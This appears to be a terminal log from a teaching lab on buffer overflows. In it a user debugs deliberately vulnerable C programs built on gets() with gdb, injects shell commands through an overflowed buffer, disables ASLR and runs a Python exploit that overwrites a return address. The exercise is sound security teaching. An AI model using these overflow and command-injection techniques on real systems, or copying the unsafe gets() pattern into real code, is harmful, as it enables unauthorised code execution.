Last login: Sat Aug 25 12:39:23 on ttys003 You have new mail. Sams-MacBook-Pro-3:~ sambowne$ ssh root@147.144.211.246 ssh: connect to host 147.144.211.246 port 22: Connection refused Sams-MacBook-Pro-3:~ sambowne$ ssh root@147.144.211.246 The authenticity of host '147.144.211.246 (147.144.211.246)' can't be established. ECDSA key fingerprint is SHA256:j86yVuf/7BQJftNakbQDU7ugWN5Gq1jSgzzh1DUwGIU. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '147.144.211.246' (ECDSA) to the list of known hosts. root@147.144.211.246's password: The programs included with the Kali GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Sat Aug 25 08:26:52 2018 from 172.16.1.1 root@kali:~# cd 127 root@kali:~/127# cd ch2 root@kali:~/127/ch2# ls buf ch2a ch2b ch2c ch2d ch2e exploit-pwd p4-server.c pwd.c buf.c ch2a.c ch2b.c ch2c.c ch2d.c ch2e.c p4-server pwd root@kali:~/127/ch2# gdb ch2e GNU gdb (Debian 7.12-6+b1) 7.12.0.20161007-git Copyright (C) 2016 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type "show copying" and "show warranty" for details. This GDB was configured as "i686-linux-gnu". Type "show configuration" for configuration details. For bug reporting instructions, please see: . Find the GDB manual and other documentation resources online at: . For help, type "help". Type "apropos word" to search for commands related to "word"... Reading symbols from ch2e...done. (gdb) list 1,12 1 #include 2 3 void user_input(void) 4 { 5 char buf[30]; 6 gets(buf); 7 printf("%s\n", buf); 8 } 9 10 int main() 11 { 12 user_input(); (gdb) b 7 Breakpoint 1 at 0x80488ba: file ch2e.c, line 7. (gdb) run Starting program: /root/127/ch2/ch2e HELLO Breakpoint 1, user_input () at ch2e.c:7 7 printf("%s\n", buf); (gdb) i r eax 0xbffff5e2 -1073744414 ecx 0x80d9340 135107392 edx 0x80da87c 135112828 ebx 0x80d9000 135106560 esp 0xbffff5e0 0xbffff5e0 ebp 0xbffff608 0xbffff608 esi 0x80d9000 135106560 edi 0x80481a8 134513064 eip 0x80488ba 0x80488ba eflags 0x282 [ SF IF ] cs 0x73 115 ss 0x7b 123 ds 0x7b 123 es 0x7b 123 fs 0x0 0 gs 0x33 51 (gdb) x/30x $esp 0xbffff5e0: 0x45480001 0x004f4c4c 0xbffff6ec 0x08049638 0xbffff5f0: 0x00000001 0xbffff6e4 0xbffff6ec 0x08049609 0xbffff600: 0x00000001 0x0804ef5b 0xbffff618 0x080488e2 0xbffff610: 0x08049650 0xbffff630 0x00000000 0x08048f0f 0xbffff620: 0x0806ebbf 0x080d9000 0x080d9000 0x08048f0f 0xbffff630: 0x00000001 0xbffff6e4 0xbffff6ec 0xbffff684 0xbffff640: 0x00000000 0x00000000 0x00000000 0x080d9000 0xbffff650: 0x00000000 0x00000000 (gdb) r The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /root/127/ch2/ch2e AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Breakpoint 1, user_input () at ch2e.c:7 7 printf("%s\n", buf); (gdb) i r eax 0xbffff5e2 -1073744414 ecx 0x80d9340 135107392 edx 0x80da87c 135112828 ebx 0x80d9000 135106560 esp 0xbffff5e0 0xbffff5e0 ebp 0xbffff608 0xbffff608 esi 0x80d9000 135106560 edi 0x80481a8 134513064 eip 0x80488ba 0x80488ba eflags 0x282 [ SF IF ] cs 0x73 115 ss 0x7b 123 ds 0x7b 123 es 0x7b 123 fs 0x0 0 gs 0x33 51 (gdb) x/30x $esp 0xbffff5e0: 0x41410001 0x41414141 0x41414141 0x41414141 0xbffff5f0: 0x41414141 0x41414141 0x41414141 0x41414141 0xbffff600: 0x41414141 0x41414141 0x41414141 0x41414141 0xbffff610: 0x41414141 0xbffff600 0x00000000 0x08048f0f 0xbffff620: 0x0806ebbf 0x080d9000 0x080d9000 0x08048f0f 0xbffff630: 0x00000001 0xbffff6e4 0xbffff6ec 0xbffff684 0xbffff640: 0x00000000 0x00000000 0x00000000 0x080d9000 0xbffff650: 0x00000000 0x00000000 (gdb) q A debugging session is active. Inferior 1 [process 7721] will be killed. Quit anyway? (y or n) y root@kali:~/127/ch2# nano buf.c root@kali:~/127/ch2# ./buf What is your name? SAM Name buffer address: bf9f4f50 Command buffer address: bf9f4f78 Goodbye, SAM! Executing command: uname -a Linux kali 4.14.0-kali3-686-pae #1 SMP Debian 4.14.13-1kali1 (2018-01-25) i686 GNU/Linux root@kali:~/127/ch2# ./buf What is your name? AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Name buffer address: bffc3ce0 Command buffer address: bffc3d08 Goodbye, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA! Executing command: AAAAAAAAAA sh: 1: AAAAAAAAAA: not found root@kali:~/127/ch2# ./buf What is your name? AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAls Name buffer address: bfd43310 Command buffer address: bfd43338 Goodbye, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAls! Executing command: ls buf ch2a ch2b ch2c ch2d ch2e exploit-pwd p4-server.c pwd.c buf.c ch2a.c ch2b.c ch2c.c ch2d.c ch2e.c p4-server pwd root@kali:~/127/ch2# nano buf.c root@kali:~/127/ch2# ./buf What is your name? AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAls;date;whoami;ifconfig Name buffer address: bf825820 Command buffer address: bf825848 Goodbye, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAls;date;whoami;ifconfig! Executing command: ls;date;whoami;ifconfig buf ch2a ch2b ch2c ch2d ch2e exploit-pwd p4-server.c pwd.c buf.c ch2a.c ch2b.c ch2c.c ch2d.c ch2e.c p4-server pwd Sat Aug 25 17:31:15 EDT 2018 root eth0: flags=4163 mtu 1500 inet 147.144.211.246 netmask 255.255.240.0 broadcast 147.144.223.255 ether 00:0c:29:d8:7a:0f txqueuelen 1000 (Ethernet) RX packets 28758 bytes 2120546 (2.0 MiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 484 bytes 83922 (81.9 KiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 device interrupt 19 base 0x2000 lo: flags=73 mtu 65536 inet 127.0.0.1 netmask 255.0.0.0 inet6 ::1 prefixlen 128 scopeid 0x10 loop txqueuelen 1000 (Local Loopback) RX packets 48 bytes 3308 (3.2 KiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 48 bytes 3308 (3.2 KiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 root@kali:~/127/ch2# ./buf What is your name? AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAls Name buffer address: bf864420 Command buffer address: bf864448 Goodbye, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAls! Executing command: ls buf ch2a ch2b ch2c ch2d ch2e exploit-pwd p4-server.c pwd.c buf.c ch2a.c ch2b.c ch2c.c ch2d.c ch2e.c p4-server pwd root@kali:~/127/ch2# ./buf What is your name? AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAls -l Name buffer address: bffae5a0 Command buffer address: bffae5c8 Goodbye, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAls! Executing command: ls buf ch2a ch2b ch2c ch2d ch2e exploit-pwd p4-server.c pwd.c buf.c ch2a.c ch2b.c ch2c.c ch2d.c ch2e.c p4-server pwd root@kali:~/127/ch2# ./buf What is your name? AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAls\ -l Name buffer address: bf93b020 Command buffer address: bf93b048 Goodbye, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAls\! Executing command: ls\ sh: 1: ls\: not found root@kali:~/127/ch2# ./buf What is your name? AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAls$IFS-l Name buffer address: bfb04ec0 Command buffer address: bfb04ee8 Goodbye, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAls$IFS-l! Executing command: ls$IFS-l total 3948 -rwxr-xr-x 1 root root 10068 Aug 25 14:46 buf -rw-r--r-- 1 root root 542 Aug 25 14:46 buf.c -rwxr-xr-x 1 root root 659892 Aug 25 09:03 ch2a -rw-r--r-- 1 root root 110 Aug 25 09:03 ch2a.c -rwxr-xr-x 1 root root 659820 Aug 25 09:29 ch2b -rw-r--r-- 1 root root 76 Aug 25 16:38 ch2b.c -rwxr-xr-x 1 root root 659940 Aug 25 09:33 ch2c -rw-r--r-- 1 root root 146 Aug 25 09:33 ch2c.c -rwxr-xr-x 1 root root 659972 Aug 25 10:22 ch2d -rw-r--r-- 1 root root 156 Aug 25 10:22 ch2d.c -rwxr-xr-x 1 root root 660020 Aug 25 10:58 ch2e -rw-r--r-- 1 root root 139 Aug 25 10:58 ch2e.c -rwxr-xr-x 1 root root 112 Aug 25 14:57 exploit-pwd -rwxr-xr-x 1 root root 9108 Aug 25 14:58 p4-server -rw-r--r-- 1 root root 1872 Aug 25 14:58 p4-server.c -rwxr-xr-x 1 root root 660140 Aug 25 14:54 pwd -rw-r--r-- 1 root root 343 Aug 25 14:54 pwd.c root@kali:~/127/ch2# echo 0 > /proc/sys/kernel/randomize_va_space root@kali:~/127/ch2# nanpo pwd.c -bash: nanpo: command not found root@kali:~/127/ch2# nano pwd.c root@kali:~/127/ch2# ./pwd Enter password: a Fail! root@kali:~/127/ch2# ./pwd Enter password: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Segmentation fault root@kali:~/127/ch2# gdb -q pwd Reading symbols from pwd...done. (gdb) list 2 3 int test_pw() 4 { 5 char pin[10]; 6 int x=15, i; 7 printf("Enter password: "); 8 gets(pin); 9 for (i=0; i<10; i+=2) x = (x & pin[i]) | pin[i+1]; 10 if (x == 48) return 0; 11 else return 1; (gdb) b 9 Breakpoint 1 at 0x80488d1: file pwd.c, line 9. (gdb) run Starting program: /root/127/ch2/pwd Enter password: AAAAAAAAAA Breakpoint 1, test_pw () at pwd.c:9 9 for (i=0; i<10; i+=2) x = (x & pin[i]) | pin[i+1]; (gdb) i r eax 0xbffff5ee -1073744402 ecx 0x80d9340 135107392 edx 0x80da87c 135112828 ebx 0x80d9000 135106560 esp 0xbffff5e0 0xbffff5e0 ebp 0xbffff608 0xbffff608 esi 0x80d9000 135106560 edi 0x80481a8 134513064 eip 0x80488d1 0x80488d1 eflags 0x282 [ SF IF ] cs 0x73 115 ss 0x7b 123 ds 0x7b 123 es 0x7b 123 fs 0x0 0 gs 0x33 51 (gdb) x/30x $esp 0xbffff5e0: 0x00000001 0xbffff6e4 0xbffff6ec 0x414196b8 0xbffff5f0: 0x41414141 0x41414141 0xbffff600 0x0000000f 0xbffff600: 0x00000001 0x0804efdb 0xbffff618 0x08048934 0xbffff610: 0x080496d0 0xbffff630 0x00000000 0x08048f8f 0xbffff620: 0x0806ec6f 0x080d9000 0x080d9000 0x08048f8f 0xbffff630: 0x00000001 0xbffff6e4 0xbffff6ec 0xbffff684 0xbffff640: 0x00000000 0x00000000 0x00000000 0x080d9000 0xbffff650: 0x00000000 0x00000000 (gdb) r The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /root/127/ch2/pwd Enter password: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Breakpoint 1, test_pw () at pwd.c:9 9 for (i=0; i<10; i+=2) x = (x & pin[i]) | pin[i+1]; (gdb) i r eax 0xbffff5ee -1073744402 ecx 0x80d9340 135107392 edx 0x80da87c 135112828 ebx 0x80d9000 135106560 esp 0xbffff5e0 0xbffff5e0 ebp 0xbffff608 0xbffff608 esi 0x80d9000 135106560 edi 0x80481a8 134513064 eip 0x80488d1 0x80488d1 eflags 0x282 [ SF IF ] cs 0x73 115 ss 0x7b 123 ds 0x7b 123 es 0x7b 123 fs 0x0 0 gs 0x33 51 (gdb) x/30x $esp 0xbffff5e0: 0x00000001 0xbffff6e4 0xbffff6ec 0x414196b8 0xbffff5f0: 0x41414141 0x41414141 0x41414141 0x41414141 0xbffff600: 0x41414141 0x41414141 0x41414141 0x41414141 0xbffff610: 0x41414141 0x41414141 0x41414141 0x41414141 0xbffff620: 0x0806ec00 0x080d9000 0x080d9000 0x08048f8f 0xbffff630: 0x00000001 0xbffff6e4 0xbffff6ec 0xbffff684 0xbffff640: 0x00000000 0x00000000 0x00000000 0x080d9000 0xbffff650: 0x00000000 0x00000000 (gdb) r The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /root/127/ch2/pwd Enter password: AABBCCDDEEFFGGHHIIJJKKLLMMNNOOPPQQRRSSTT Breakpoint 1, test_pw () at pwd.c:9 9 for (i=0; i<10; i+=2) x = (x & pin[i]) | pin[i+1]; (gdb) x/30x $esp 0xbffff5e0: 0x00000001 0xbffff6e4 0xbffff6ec 0x414196b8 0xbffff5f0: 0x43434242 0x45454444 0x47474646 0x49494848 0xbffff600: 0x4b4b4a4a 0x4d4d4c4c 0x4f4f4e4e 0x51515050 0xbffff610: 0x53535252 0xbf005454 0x00000000 0x08048f8f 0xbffff620: 0x0806ec6f 0x080d9000 0x080d9000 0x08048f8f 0xbffff630: 0x00000001 0xbffff6e4 0xbffff6ec 0xbffff684 0xbffff640: 0x00000000 0x00000000 0x00000000 0x080d9000 0xbffff650: 0x00000000 0x00000000 (gdb) q A debugging session is active. Inferior 1 [process 8153] will be killed. Quit anyway? (y or n) y root@kali:~/127/ch2# nano expldemo root@kali:~/127/ch2# gdb -q pwd Reading symbols from pwd...done. (gdb) list 1,20 1 #include 2 3 int test_pw() 4 { 5 char pin[10]; 6 int x=15, i; 7 printf("Enter password: "); 8 gets(pin); 9 for (i=0; i<10; i+=2) x = (x & pin[i]) | pin[i+1]; 10 if (x == 48) return 0; 11 else return 1; 12 } 13 14 void main() 15 { 16 if (test_pw()) printf("Fail!\n"); 17 else printf("You win!\n"); 18 } (gdb) disassemble main Dump of assembler code for function main: 0x0804891e <+0>: lea 0x4(%esp),%ecx 0x08048922 <+4>: and $0xfffffff0,%esp 0x08048925 <+7>: pushl -0x4(%ecx) 0x08048928 <+10>: push %ebp 0x08048929 <+11>: mov %esp,%ebp 0x0804892b <+13>: push %ecx 0x0804892c <+14>: sub $0x4,%esp 0x0804892f <+17>: call 0x80488a5 0x08048934 <+22>: test %eax,%eax 0x08048936 <+24>: je 0x804894a 0x08048938 <+26>: sub $0xc,%esp 0x0804893b <+29>: push $0x80aba59 0x08048940 <+34>: call 0x8050290 0x08048945 <+39>: add $0x10,%esp 0x08048948 <+42>: jmp 0x804895a 0x0804894a <+44>: sub $0xc,%esp 0x0804894d <+47>: push $0x80aba5f 0x08048952 <+52>: call 0x8050290 0x08048957 <+57>: add $0x10,%esp 0x0804895a <+60>: nop 0x0804895b <+61>: mov -0x4(%ebp),%ecx 0x0804895e <+64>: leave ---Type to continue, or q to quit---q Quit (gdb) q root@kali:~/127/ch2# nano expldemo root@kali:~/127/ch2# python expldemo AABBCCDDEEFFGGHHIIJJKKLLMMNNO?M root@kali:~/127/ch2# python expldemo | ./pwd Segmentation fault root@kali:~/127/ch2# python expldemo > att1 root@kali:~/127/ch2# ./pwd < att1 Segmentation fault root@kali:~/127/ch2# gdb pwd GNU gdb (Debian 7.12-6+b1) 7.12.0.20161007-git Copyright (C) 2016 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type "show copying" and "show warranty" for details. This GDB was configured as "i686-linux-gnu". Type "show configuration" for configuration details. For bug reporting instructions, please see: . Find the GDB manual and other documentation resources online at: . For help, type "help". Type "apropos word" to search for commands related to "word"... Reading symbols from pwd...done. (gdb) list 1,20 1 #include 2 3 int test_pw() 4 { 5 char pin[10]; 6 int x=15, i; 7 printf("Enter password: "); 8 gets(pin); 9 for (i=0; i<10; i+=2) x = (x & pin[i]) | pin[i+1]; 10 if (x == 48) return 0; 11 else return 1; 12 } 13 14 void main() 15 { 16 if (test_pw()) printf("Fail!\n"); 17 else printf("You win!\n"); 18 } (gdb) break 9 Breakpoint 1 at 0x80488d1: file pwd.c, line 9. (gdb) run < att1 Starting program: /root/127/ch2/pwd < att1 Breakpoint 1, test_pw () at pwd.c:9 9 for (i=0; i<10; i+=2) x = (x & pin[i]) | pin[i+1]; (gdb) info registers eax 0xbffff5ee -1073744402 ecx 0x80d9340 135107392 edx 0x80da87c 135112828 ebx 0x80d9000 135106560 esp 0xbffff5e0 0xbffff5e0 ebp 0xbffff608 0xbffff608 esi 0x80d9000 135106560 edi 0x80481a8 134513064 eip 0x80488d1 0x80488d1 eflags 0x282 [ SF IF ] cs 0x73 115 ss 0x7b 123 ds 0x7b 123 es 0x7b 123 fs 0x0 0 gs 0x33 51 (gdb) x/30x $esp 0xbffff5e0: 0x00000001 0xbffff6e4 0xbffff6ec 0x414196b8 0xbffff5f0: 0x43434242 0x45454444 0x47474646 0x49494848 0xbffff600: 0x4b4b4a4a 0x4d4d4c4c 0x4f4f4e4e 0x4d890408 0xbffff610: 0x08049600 0xbffff630 0x00000000 0x08048f8f 0xbffff620: 0x0806ec6f 0x080d9000 0x080d9000 0x08048f8f 0xbffff630: 0x00000001 0xbffff6e4 0xbffff6ec 0xbffff684 0xbffff640: 0x00000000 0x00000000 0x00000000 0x080d9000 0xbffff650: 0x00000000 0x00000000 (gdb) 0xbffff658: 0x00000000 0x00000006 0x00000046 0x00000040 0xbffff668: 0x00000001 0x00000000 0x00000000 0x00000000 0xbffff678: 0x00000000 0x00000000 0x00000000 0x080d9000 0xbffff688: 0x080d9000 0x080481a8 0x00000000 0x7eaabeaf 0xbffff698: 0x885857c0 0x00000000 0x00000000 0x00000000 0xbffff6a8: 0x00000000 0x00000000 0x080d9000 0x00000001 0xbffff6b8: 0x00000000 0x08048762 0x0804891e 0x00000001 0xbffff6c8: 0xbffff6e4 0x08049630 (gdb) q A debugging session is active. Inferior 1 [process 8251] will be killed. Quit anyway? (y or n) y root@kali:~/127/ch2# ls att1 ch2a ch2b.c ch2d ch2e.c p4-server pwd.c buf ch2a.c ch2c ch2d.c expldemo p4-server.c buf.c ch2b ch2c.c ch2e exploit-pwd pwd root@kali:~/127/ch2# nano expldemo root@kali:~/127/ch2# python expldemo | ./pwd Enter password: You win! Segmentation fault root@kali:~/127/ch2# gdb ch2e GNU gdb (Debian 7.12-6+b1) 7.12.0.20161007-git Copyright (C) 2016 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type "show copying" and "show warranty" for details. This GDB was configured as "i686-linux-gnu". Type "show configuration" for configuration details. For bug reporting instructions, please see: . Find the GDB manual and other documentation resources online at: . For help, type "help". Type "apropos word" to search for commands related to "word"... Reading symbols from ch2e...done. (gdb) list 1 #include 2 3 void user_input(void) 4 { 5 char buf[30]; 6 gets(buf); 7 printf("%s\n", buf); 8 } 9 10 int main() (gdb) break 7 Breakpoint 1 at 0x80488ba: file ch2e.c, line 7. (gdb) run Starting program: /root/127/ch2/ch2e AAAAA Breakpoint 1, user_input () at ch2e.c:7 7 printf("%s\n", buf); (gdb) info registers eax 0xbffff5e2 -1073744414 ecx 0x80d9340 135107392 edx 0x80da87c 135112828 ebx 0x80d9000 135106560 esp 0xbffff5e0 0xbffff5e0 ebp 0xbffff608 0xbffff608 esi 0x80d9000 135106560 edi 0x80481a8 134513064 eip 0x80488ba 0x80488ba eflags 0x282 [ SF IF ] cs 0x73 115 ss 0x7b 123 ds 0x7b 123 es 0x7b 123 fs 0x0 0 gs 0x33 51 (gdb) x/20x $esp 0xbffff5e0: 0x41410001 0x00414141 0xbffff6ec 0x08049638 0xbffff5f0: 0x00000001 0xbffff6e4 0xbffff6ec 0x08049609 0xbffff600: 0x00000001 0x0804ef5b 0xbffff618 0x080488e2 0xbffff610: 0x08049650 0xbffff630 0x00000000 0x08048f0f 0xbffff620: 0x0806ebbf 0x080d9000 0x080d9000 0x08048f0f (gdb) x/20c $esp 0xbffff5e0: 1 '\001' 0 '\000' 65 'A' 65 'A' 65 'A' 65 'A' 65 'A' 0 '\000' 0xbffff5e8: -20 '\354' -10 '\366' -1 '\377' -65 '\277' 56 '8' -106 '\226' 4 '\004' 8 '\b' 0xbffff5f0: 1 '\001' 0 '\000' 0 '\000' 0 '\000' (gdb) help List of classes of commands: aliases -- Aliases of other commands breakpoints -- Making program stop at certain points data -- Examining data files -- Specifying and examining files internals -- Maintenance commands obscure -- Obscure features running -- Running the program stack -- Examining the stack status -- Status inquiries support -- Support facilities tracepoints -- Tracing of program execution without stopping the program user-defined -- User-defined commands Type "help" followed by a class name for a list of commands in that class. Type "help all" for the list of all commands. Type "help" followed by command name for full documentation. Type "apropos word" to search for commands related to "word". Command name abbreviations are allowed if unambiguous. (gdb) help x Examine memory: x/FMT ADDRESS. ADDRESS is an expression for the memory address to examine. FMT is a repeat count followed by a format letter and a size letter. Format letters are o(octal), x(hex), d(decimal), u(unsigned decimal), t(binary), f(float), a(address), i(instruction), c(char), s(string) and z(hex, zero padded on the left). Size letters are b(byte), h(halfword), w(word), g(giant, 8 bytes). The specified number of objects of the specified size are printed according to the format. If a negative number is specified, memory is examined backward from the address. Defaults for format and size letters are those previously used. Default count is 1. Default address is following last thing printed with this command or "print". (gdb)